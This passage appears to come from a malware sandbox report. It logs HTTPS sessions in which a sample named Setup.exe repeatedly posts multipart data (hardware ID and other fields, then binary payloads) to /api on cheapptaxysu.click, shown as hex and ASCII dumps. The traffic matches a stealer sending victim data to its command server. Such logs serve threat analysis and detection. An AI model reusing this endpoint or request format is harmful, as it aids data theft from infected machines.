                                                                                                                        2024-12-24 01:59:14 UTC1369INData Raw: 48 57 61 44 6d 31 62 5a 39 66 47 68 52 74 30 31 76 36 45 66 66 4d 6a 67 78 31 77 31 7a 58 2f 4e 34 52 2b 66 35 65 69 38 2b 70 6c 64 4a 30 66 4f 49 73 76 30 6b 54 41 58 4c 4d 64 50 6f 52 76 39 76 4a 46 44 48 42 58 5a 47 6f 6c 42 6e 73 39 46 32 52 68 75 44 62 32 6d 38 75 75 32 47 56 53 77 38 63 59 4d 5a 5a 38 52 48 35 78 59 49 48 66 63 46 55 32 76 2f 59 55 4c 43 77 56 35 76 50 76 35 58 37 5a 79 2b 74 62 35 42 53 48 67 67 6b 33 68 76 75 58 76 6a 49 78 31 55 78 78 56 72 61 39 4e 51 63 2f 76 52 64 67 35 33 6f 30 74 4a 6c 4e 36 68 6d 6d 56 34 44 47 32 2f 4f 55 2b 55 53 38 64 61 43 48 32 4f 47 48 35 48 33 7a 46 43 6d 73 47 61 45 6e 2f 66 57 6c 31 30 71 75 58 71 56 56 41 52 54 65 34 39 4d 74 78 6e 7a 68 4e 39 4e 64 38 6c 59 30 76 2f 56 47 66 4c 39 56 59 71 4b 35
                                                                                                                        Data Ascii: HWaDm1bZ9fGhRt01v6EffMjgx1w1zX/N4R+f5ei8+pldJ0fOIsv0kTAXLMdPoRv9vJFDHBXZGolBns9F2RhuDb2m8uu2GVSw8cYMZZ8RH5xYIHfcFU2v/YULCwV5vPv5X7Zy+tb5BSHggk3hvuXvjIx1UxxVra9NQc/vRdg53o0tJlN6hmmV4DG2/OU+US8daCH2OGH5H3zFCmsGaEn/fWl10quXqVVARTe49MtxnzhN9Nd8lY0v/VGfL9VYqK5
                                                                                                                        2024-12-24 01:59:14 UTC1369INData Raw: 79 69 47 2b 46 47 52 64 64 66 59 46 53 2b 31 36 6e 68 49 51 4b 63 73 64 62 32 50 7a 62 46 2f 72 69 57 6f 53 64 35 74 54 65 59 54 43 36 59 5a 4e 54 43 52 70 70 7a 56 6a 77 47 66 44 42 78 30 4d 78 77 55 6d 52 71 4a 51 78 38 2f 74 63 32 4e 57 6e 79 70 74 31 66 4c 31 67 33 67 46 49 45 32 37 45 58 2f 6f 64 38 4d 65 56 44 48 66 55 55 64 7a 36 78 68 72 31 39 56 32 4f 67 75 54 54 30 32 63 77 71 47 57 65 57 67 4e 54 4b 6f 46 53 37 31 36 6e 68 4b 51 61 5a 38 78 57 33 65 62 66 45 66 33 6d 58 5a 50 50 71 5a 58 45 61 79 33 36 4e 49 68 4a 48 78 52 37 6a 30 79 33 47 66 4f 45 33 30 31 33 7a 31 66 57 39 74 6f 43 2b 2f 5a 66 6a 49 62 75 30 64 31 76 50 4c 35 6f 6d 56 77 4c 48 32 2f 47 56 76 67 61 39 73 71 4f 41 6a 47 49 45 64 62 6f 6c 45 69 2b 30 55 75 41 67 2b 71 56 79 69
                                                                                                                        Data Ascii: yiG+FGRddfYFS+16nhIQKcsdb2PzbF/riWoSd5tTeYTC6YZNTCRppzVjwGfDBx0MxwUmRqJQx8/tc2NWnypt1fL1g3gFIE27EX/od8MeVDHfUUdz6xhr19V2OguTT02cwqGWeWgNTKoFS716nhKQaZ8xW3ebfEf3mXZPPqZXEay36NIhJHxR7j0y3GfOE3013z1fW9toC+/ZfjIbu0d1vPL5omVwLH2/GVvga9sqOAjGIEdbolEi+0UuAg+qVyi
                                                                                                                        2024-12-24 01:59:14 UTC1369INData Raw: 30 42 6b 50 43 79 53 5a 46 64 63 56 36 63 47 41 47 7a 50 7a 55 74 2f 2b 30 77 61 2b 37 32 2f 4e 7a 2b 6a 50 6c 54 51 46 6f 79 79 5a 56 55 68 4c 4a 4e 52 53 39 78 6e 6c 30 6f 41 42 59 4d 31 63 33 64 4c 62 46 2b 6a 7a 58 34 43 65 37 70 6e 65 59 58 7a 30 4c 4a 6c 42 53 45 73 6b 37 6c 4c 68 48 64 44 48 6c 67 51 78 69 42 48 57 35 70 52 49 76 73 34 51 6b 59 7a 33 31 74 70 39 41 76 6f 30 68 32 64 49 47 48 4c 47 52 66 51 49 39 4d 6d 4c 48 45 2b 47 43 59 57 69 68 6b 4b 73 6f 6b 2f 44 6b 4e 69 62 6c 57 31 38 34 6c 57 48 47 52 35 54 50 4a 4d 62 74 77 79 2f 6e 4d 64 4b 63 74 52 44 31 2f 50 43 45 37 6e 4f 62 71 53 5a 37 64 4c 46 61 79 75 31 4c 4e 41 5a 42 31 4d 38 2b 42 58 2b 47 65 54 56 6b 51 42 68 77 52 48 75 76 70 51 49 76 71 67 51 74 6f 7a 70 32 39 4a 36 4c 66 64
                                                                                                                        Data Ascii: 0BkPCySZFdcV6cGAGzPzUt/+0wa+72/Nz+jPlTQFoyyZVUhLJNRS9xnl0oABYM1c3dLbF+jzX4Ce7pneYXz0LJlBSEsk7lLhHdDHlgQxiBHW5pRIvs4QkYz31tp9Avo0h2dIGHLGRfQI9MmLHE+GCYWihkKsok/DkNiblW184lWHGR5TPJMbtwy/nMdKctRD1/PCE7nObqSZ7dLFayu1LNAZB1M8+BX+GeTVkQBhwRHuvpQIvqgQtozp29J6Lfd
                                                                                                                        2024-12-24 01:59:14 UTC1369INData Raw: 31 52 61 2f 31 54 36 45 62 50 4b 6a 41 31 32 31 6b 66 4b 76 4e 77 54 35 4f 70 75 76 61 54 72 30 39 4a 32 4f 37 78 4b 76 68 6c 47 55 32 75 42 44 63 35 65 74 34 53 34 51 7a 48 65 45 59 6d 77 34 52 50 77 2f 6c 65 56 6e 71 72 39 39 6c 59 47 2b 45 43 5a 54 45 6f 6e 59 39 46 45 2f 42 50 7a 68 4d 6c 4e 64 34 59 4a 67 62 36 55 46 4f 2b 77 43 4e 50 64 76 49 43 47 4f 32 7a 6f 63 39 42 41 53 41 55 6b 6d 51 65 35 58 75 32 45 33 30 30 32 78 55 50 44 39 74 63 47 2f 62 64 75 76 61 6a 70 30 74 52 36 4c 4b 31 6a 6f 47 63 64 45 47 72 50 55 75 45 50 76 34 72 48 41 6a 47 65 61 4a 47 34 6c 43 2b 77 73 45 6a 44 31 36 66 67 31 6d 49 79 76 58 71 50 46 43 38 64 59 38 42 44 35 77 6e 77 68 4d 6c 4e 64 34 59 4a 67 37 36 55 46 4f 2b 77 43 4e 50 64 76 49 43 47 4f 32 7a 6f 63 39 42 41
                                                                                                                        Data Ascii: 1Ra/1T6EbPKjA121kfKvNwT5OpuvaTr09J2O7xKvhlGU2uBDc5et4S4QzHeEYmw4RPw/leVnqr99lYG+ECZTEonY9FE/BPzhMlNd4YJgb6UFO+wCNPdvICGO2zoc9BASAUkmQe5Xu2E3002xUPD9tcG/bduvajp0tR6LK1joGcdEGrPUuEPv4rHAjGeaJG4lC+wsEjD16fg1mIyvXqPFC8dY8BD5wnwhMlNd4YJg76UFO+wCNPdvICGO2zoc9BA
                                                                                                                        2024-12-24 01:59:14 UTC1369INData Raw: 42 66 35 78 50 77 77 38 55 74 64 74 42 53 6b 62 36 55 48 4c 36 6f 45 49 4b 46 39 39 6a 61 61 33 43 39 64 70 6b 5a 52 6c 4e 71 67 51 32 33 48 2f 58 55 69 67 4a 32 69 6c 66 66 2f 70 51 50 73 4f 6b 51 6c 63 2b 2f 68 70 73 73 4c 76 6f 30 33 68 34 4c 41 58 62 48 56 75 45 64 75 50 71 35 49 47 50 42 51 64 4b 79 35 52 33 36 35 6b 57 41 6e 2b 44 72 36 30 45 75 76 58 79 64 47 7a 6b 46 5a 38 46 62 38 46 36 78 68 4a 39 4e 4b 59 5a 38 77 2f 66 45 45 37 36 2b 45 49 2f 50 76 35 58 59 66 6a 75 71 62 39 4a 65 45 68 51 6b 33 68 76 75 58 75 6d 45 33 31 34 2f 68 6b 4f 52 71 4a 52 58 38 50 31 52 67 49 48 6b 78 38 64 71 50 36 78 76 32 57 63 32 50 6e 62 47 52 66 52 63 7a 73 6d 44 47 32 54 46 51 64 62 4f 36 6a 33 73 39 30 43 41 7a 63 76 53 32 47 41 43 68 46 75 50 58 68 68 52 51
                                                                                                                        Data Ascii: Bf5xPww8UtdtBSkb6UHL6oEIKF99jaa3C9dpkZRlNqgQ23H/XUigJ2ilff/pQPsOkQlc+/hpssLvo03h4LAXbHVuEduPq5IGPBQdKy5R365kWAn+Dr60EuvXydGzkFZ8Fb8F6xhJ9NKYZ8w/fEE76+EI/Pv5XYfjuqb9JeEhQk3hvuXumE314/hkORqJRX8P1RgIHkx8dqP6xv2Wc2PnbGRfRczsmDG2TFQdbO6j3s90CAzcvS2GAChFuPXhhRQ


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        2192.168.2.449734172.67.177.884435064C:\Users\user\Desktop\Setup.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-12-24 01:59:15 UTC366OUTPOST /api HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: multipart/form-data; boundary=2DI73TQIR9G
                                                                                                                        Cookie: __cf_mw_byp=hQv64SvizH_hIw.gtxtZwh7O0y57R_Bbkxkmg0Nx3b0-1735005551-0.0.1.1-/api
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                        Content-Length: 18116
                                                                                                                        Host: cheapptaxysu.click
                                                                                                                        2024-12-24 01:59:15 UTC15331OUTData Raw: 2d 2d 32 44 49 37 33 54 51 49 52 39 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 44 32 37 39 33 30 34 37 33 32 34 35 31 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 32 44 49 37 33 54 51 49 52 39 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 44 49 37 33 54 51 49 52 39 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 0d 0a 2d 2d 32 44 49 37 33 54 51 49 52 39 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                        Data Ascii: --2DI73TQIR9GContent-Disposition: form-data; name="hwid"7D279304732451ACAC8923850305D13E--2DI73TQIR9GContent-Disposition: form-data; name="pid"2--2DI73TQIR9GContent-Disposition: form-data; name="lid"CZJvss----2DI73TQIR9GContent-D
                                                                                                                        2024-12-24 01:59:15 UTC2785OUTData Raw: c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f
                                                                                                                        Data Ascii: .\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_
                                                                                                                        2024-12-24 01:59:16 UTC1131INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 24 Dec 2024 01:59:16 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Set-Cookie: PHPSESSID=fb3cm5rclv16gm4lrf79p4orr8; expires=Fri, 18 Apr 2025 19:45:55 GMT; Max-Age=9999999; path=/
                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        X-Frame-Options: DENY
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                        vary: accept-encoding
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qZ7puxaqaSlq46Zgp65og9DNaP0Z%2F6Dt6EpaMiSgwAwjz%2BEMz542gB0N86WrvDUCfQ2wbkzsnlRkdBOs15lg1CYoyYvTArWUTZgxRGZyLpROy0HJ8TIW41nvGS%2BMBQcyYsxL5dw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8f6cfdb48ed70c92-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1492&min_rtt=1492&rtt_var=560&sent=14&recv=22&lost=0&retrans=0&sent_bytes=2843&recv_bytes=19162&delivery_rate=1954484&cwnd=165&unsent_bytes=0&cid=88af8e1578cf6b6e&ts=970&x=0"
                                                                                                                        2024-12-24 01:59:16 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                        2024-12-24 01:59:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        3192.168.2.449736172.67.177.884435064C:\Users\user\Desktop\Setup.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-12-24 01:59:18 UTC369OUTPOST /api HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: multipart/form-data; boundary=VE81SLGBJTH2XMH
                                                                                                                        Cookie: __cf_mw_byp=hQv64SvizH_hIw.gtxtZwh7O0y57R_Bbkxkmg0Nx3b0-1735005551-0.0.1.1-/api
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                        Content-Length: 8761
                                                                                                                        Host: cheapptaxysu.click
                                                                                                                        2024-12-24 01:59:18 UTC8761OUTData Raw: 2d 2d 56 45 38 31 53 4c 47 42 4a 54 48 32 58 4d 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 44 32 37 39 33 30 34 37 33 32 34 35 31 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 56 45 38 31 53 4c 47 42 4a 54 48 32 58 4d 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 45 38 31 53 4c 47 42 4a 54 48 32 58 4d 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 0d 0a 2d 2d 56 45 38 31 53 4c 47 42 4a 54
                                                                                                                        Data Ascii: --VE81SLGBJTH2XMHContent-Disposition: form-data; name="hwid"7D279304732451ACAC8923850305D13E--VE81SLGBJTH2XMHContent-Disposition: form-data; name="pid"2--VE81SLGBJTH2XMHContent-Disposition: form-data; name="lid"CZJvss----VE81SLGBJT
                                                                                                                        2024-12-24 01:59:18 UTC1143INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 24 Dec 2024 01:59:18 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Set-Cookie: PHPSESSID=si7dkd9uiakl43e2fdo0csip0f; expires=Fri, 18 Apr 2025 19:45:57 GMT; Max-Age=9999999; path=/
                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        X-Frame-Options: DENY
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                        vary: accept-encoding
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VjsxwsRJhE%2BP%2BaBqzJRCmLK6%2FIKh%2Fvu%2FOyUNWZ2zNw42PJQ52yVu3TE7DK5db%2BNfIvNOc8F1CT%2FGZ0uHfkQKU5LmKtkiraB0ynEKPrScLjl9A5M0i%2BxYbI%2F1JC%2B2g7o7L4wZSIc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8f6cfdc319715e66-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2319&min_rtt=2305&rtt_var=893&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2843&recv_bytes=9788&delivery_rate=1206611&cwnd=182&unsent_bytes=0&cid=e3ff6331a5b54eb6&ts=849&x=0"
                                                                                                                        2024-12-24 01:59:18 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                        2024-12-24 01:59:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        4192.168.2.449739172.67.177.884435064C:\Users\user\Desktop\Setup.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-12-24 01:59:20 UTC363OUTPOST /api HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: multipart/form-data; boundary=PG9JI3AQ
                                                                                                                        Cookie: __cf_mw_byp=hQv64SvizH_hIw.gtxtZwh7O0y57R_Bbkxkmg0Nx3b0-1735005551-0.0.1.1-/api
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                        Content-Length: 20372
                                                                                                                        Host: cheapptaxysu.click
                                                                                                                        2024-12-24 01:59:20 UTC15331OUTData Raw: 2d 2d 50 47 39 4a 49 33 41 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 44 32 37 39 33 30 34 37 33 32 34 35 31 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 50 47 39 4a 49 33 41 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 50 47 39 4a 49 33 41 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 0d 0a 2d 2d 50 47 39 4a 49 33 41 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20
                                                                                                                        Data Ascii: --PG9JI3AQContent-Disposition: form-data; name="hwid"7D279304732451ACAC8923850305D13E--PG9JI3AQContent-Disposition: form-data; name="pid"3--PG9JI3AQContent-Disposition: form-data; name="lid"CZJvss----PG9JI3AQContent-Disposition:
                                                                                                                        2024-12-24 01:59:20 UTC5041OUTData Raw: 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29 f8 d7 c1 d7 cc 07 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: Mn 64F6(X&7~`aO@dR<x)
                                                                                                                        2024-12-24 01:59:21 UTC1140INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 24 Dec 2024 01:59:21 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Set-Cookie: PHPSESSID=d9h26r230esp734tn60im0dfjc; expires=Fri, 18 Apr 2025 19:46:00 GMT; Max-Age=9999999; path=/
                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        X-Frame-Options: DENY
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                        vary: accept-encoding
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VdJN%2FFLbwd%2BZFUmLm557H49rGVxEibm9plSuWmm0%2BGWIw%2BjQfylE02fvvipzhR0HGrpSKTmrY6pCBCFH%2FbKI60AgCLaSwcjxMPY3NQHI4UMAcJ3DyHDjDf0ZBfLnl%2FG%2FmGU8B9U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8f6cfdd19fb8c340-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1506&min_rtt=1502&rtt_var=572&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2843&recv_bytes=21415&delivery_rate=1898569&cwnd=146&unsent_bytes=0&cid=c0f6a00698814e78&ts=1031&x=0"
                                                                                                                        2024-12-24 01:59:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                        2024-12-24 01:59:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        5192.168.2.449741172.67.177.884435064C:\Users\user\Desktop\Setup.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-12-24 01:59:23 UTC372OUTPOST /api HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: multipart/form-data; boundary=JRYC9AD8ZYY30IA3JQ
                                                                                                                        Cookie: __cf_mw_byp=hQv64SvizH_hIw.gtxtZwh7O0y57R_Bbkxkmg0Nx3b0-1735005551-0.0.1.1-/api
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                        Content-Length: 1248
                                                                                                                        Host: cheapptaxysu.click
                                                                                                                        2024-12-24 01:59:23 UTC1248OUTData Raw: 2d 2d 4a 52 59 43 39 41 44 38 5a 59 59 33 30 49 41 33 4a 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 44 32 37 39 33 30 34 37 33 32 34 35 31 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4a 52 59 43 39 41 44 38 5a 59 59 33 30 49 41 33 4a 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4a 52 59 43 39 41 44 38 5a 59 59 33 30 49 41 33 4a 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 0d 0a 2d 2d 4a
                                                                                                                        Data Ascii: --JRYC9AD8ZYY30IA3JQContent-Disposition: form-data; name="hwid"7D279304732451ACAC8923850305D13E--JRYC9AD8ZYY30IA3JQContent-Disposition: form-data; name="pid"1--JRYC9AD8ZYY30IA3JQContent-Disposition: form-data; name="lid"CZJvss----J
                                                                                                                        2024-12-24 01:59:23 UTC1135INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 24 Dec 2024 01:59:23 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Set-Cookie: PHPSESSID=611fc5dmddq2pvricdieb7tlo1; expires=Fri, 18 Apr 2025 19:46:02 GMT; Max-Age=9999999; path=/
                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        X-Frame-Options: DENY
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                        vary: accept-encoding
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VuQcBkCBghbx7IxshFbzNrXk5Z1PD7%2B7UjL1x%2BqtsvcPIRhFDQ3JwOAKMnxyX5MTmIXIYRVofw%2FRdnc1c75LieCGsrTPHsUEv8unSsnK9BxauALMY%2FEeCacO%2BiWOtr96%2FIjA%2B1E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8f6cfde1dfcd0c74-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1608&rtt_var=608&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=2256&delivery_rate=1792510&cwnd=84&unsent_bytes=0&cid=d8abbe58ac78ad72&ts=773&x=0"
                                                                                                                        2024-12-24 01:59:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                        2024-12-24 01:59:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        6192.168.2.449743172.67.177.884435064C:\Users\user\Desktop\Setup.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-12-24 01:59:25 UTC375OUTPOST /api HTTP/1.1
                                                                                                                        Connection: Keep-Alive
